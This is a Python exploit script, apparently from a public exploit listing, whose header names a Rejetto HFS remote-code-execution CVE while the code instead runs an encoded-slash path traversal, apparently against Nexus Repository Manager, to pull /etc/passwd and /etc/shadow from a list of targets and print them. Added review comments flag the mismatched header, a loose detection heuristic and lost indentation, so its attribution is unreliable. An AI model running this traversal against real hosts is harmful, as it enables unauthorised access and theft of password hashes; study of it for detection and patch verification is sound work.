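# Exploit Title: Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
# Fofa Dork: "HttpFileServer" && server=="HFS 2.3m"
# Date: 2024-09-22
# Exploit Author: VeryLazyTech
# GitHub: https://github.com/verylazytech/CVE-2024-23692
# Vendor Homepage: http://rejetto.com/hfs/
# Software Link: http://rejetto.com/hfs/
# Version: 2.3m
# Tested on: Windows 10
# CVE: CVE-2024-23692
#
# NOTE(review): the header above does not match the code below. The code
# requests Unix files (/etc/passwd, /etc/shadow) through an encoded-slash
# path traversal, filters on a Nexus Repository Manager passwd entry, and its
# argparse description names CVE-2024-4956. Nothing in it touches Rejetto HFS
# or Windows. The header looks carried over from another script; confirm
# which advisory this file belongs to before using it as a reference for
# detection or patch verification.
#
# Log indicator derived from the request built here: an unauthenticated GET
# whose path begins with a run of encoded slashes (%2F) followed by repeated
# "..%2F" segments and ends in /etc/passwd or /etc/shadow.

import argparse
import random

import requests
from colorama import Fore, Style

green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT

colors = [green, cyan, blue]
# Chosen once at import time, so every banner in a run uses the same colour.
random_color = random.choice(colors)

# ASCII-art text of the banner. Raw strings are used because the art is full
# of backslashes that are not valid escape sequences; inside a normal
# (f-)string they trigger a SyntaxWarning on current Python versions.
# NOTE(review): the art's line breaks and spacing were already collapsed on
# the page this listing was taken from; the text is kept exactly as found.
_BANNER_ART = (
    r" ______ _______ ____ ___ ______ __ _______ __ "
    r"/ ___\ \ / / ____| |___ \ / _ \___ \| || | | || | / _ \| ___| / /_ "
    r"| |\ \ / /|_| __) | | | |__) | || |_| || || (_) |___ \| '_ \ "
    r"| |___\ V / | |___ / __/| |_| / __/|__ _| |__ _\__, |___) | (_) | "
    r"\____|\_/|_____| |_____|\___/_____||_||_| /_/|____/ \___/ "
    r"__ ________ _ "
    r"\ \ / /__ _ __ _ _| |__ _ _____ _|_ _|_____| |__ "
    r"\ \ / / _ \ '__| | | | | | / _` |_/ | | | | |/ _ \/ __| '_ \ "
    r"\ V /__/ || |_| | | |__| (_| |/ /| |_| | | |__/ (__| | | | "
    r"\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_| "
    r"|___/|___/ "
)


def banner():
    """Return the coloured banner text followed by the author tag line."""
    return (
        f"{bold}{random_color}{_BANNER_ART}"
        f"{bold}{white}@VeryLazyTech - Medium {reset}\n"
    )


def read_ip_port_list(file_path):
    """Read one target per line from *file_path*.

    Surrounding whitespace is stripped and blank lines are skipped, so an
    empty line in the file no longer turns into a malformed request.
    """
    with open(file_path, 'r') as file:
        return [entry for entry in (line.strip() for line in file) if entry]


def make_request(ip_port, url_path):
    """GET ``http://{ip_port}/{url_path}`` and return the response body.

    Returns the body text for any response, whatever its status code, and
    ``None`` when ``requests`` raises (connection error, timeout, invalid
    URL). The scheme is always prepended here, so *ip_port* is expected as
    ``host:port`` without ``http://``; plain HTTP is the only scheme used.
    """
    url = f"http://{ip_port}/{url_path}"
    try:
        return requests.get(url, timeout=5).text
    except requests.RequestException:
        return None


def main(ip_port_list):
    """Request the two traversal paths on every target and print any hit.

    On a hit the target address and the full response body are printed, and
    the remaining path for that target is skipped. For the second path the
    printed body is the shadow file as returned by the server.
    """
    url_paths = [
        "%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd",
        "%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/shadow",
    ]
    excluded_markers = (
        "nexus:x:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false",
        "Not Found",
        "400 Bad Request",
    )
    for ip_port in ip_port_list:
        for url_path in url_paths:
            response_text = make_request(ip_port, url_path)
            # Hit heuristic, kept as the author wrote it: a non-empty body
            # that contains none of the excluded strings and does contain
            # "root".
            # NOTE(review): "root" on its own is a loose match, so any page
            # containing that word and none of the excluded strings is
            # reported as a hit. Why the Nexus service-account line is
            # excluded is not explained anywhere in the file; confirm the
            # intent before relying on the results.
            if not response_text:
                continue
            if any(marker in response_text for marker in excluded_markers):
                continue
            if "root" not in response_text:
                continue
            label = "passwd" if "passwd" in url_path else "shadow"
            print(f"Address: {ip_port}")
            print(f"File Contents for {label}:\n{response_text}")
            # NOTE(review): indentation was lost on the page; the break is
            # placed inside the hit branch, the only placement under which
            # the second path is ever requested.
            break


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-4956",
        usage=argparse.SUPPRESS,
    )
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument(
        "-u", "--url", type=str,
        help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or IP with port for vulnerability detection\n",
    )
    group.add_argument(
        "-l", "--list", type=str,
        help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs or IPs for vulnerability detection\n",
    )
    args = parser.parse_args()

    # The group is required and mutually exclusive, so exactly one option is
    # set; the help fallback is reached only when its value is an empty string.
    if args.list:
        targets = read_ip_port_list(args.list)
    elif args.url:
        targets = [args.url]
    else:
        targets = None

    print(banner())
    if targets is None:
        parser.print_help()
    else:
        main(targets)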